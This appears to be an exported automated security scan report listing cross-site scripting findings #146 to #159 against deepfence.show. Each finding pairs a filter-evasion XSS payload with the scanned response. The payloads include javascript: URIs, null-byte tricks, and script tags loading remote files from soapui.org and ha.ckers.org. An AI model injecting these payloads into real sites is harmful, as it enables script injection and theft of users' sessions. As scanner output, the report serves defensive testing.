<!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #146\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #147\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #148\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' >\nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #149\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io perl -e 'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";' \n> out\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #150\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\" &#14; javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #151\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT/XSS SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #152\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #153\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT/SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #154\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #155\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=http://soapui.org/xss.js?<B>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #156\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=//ha.ckers.org/.j>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #157\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"javascript:alert('XSS')\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #158\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <iframe src=http://soapui.org/scriptlet.html <\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #159\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> 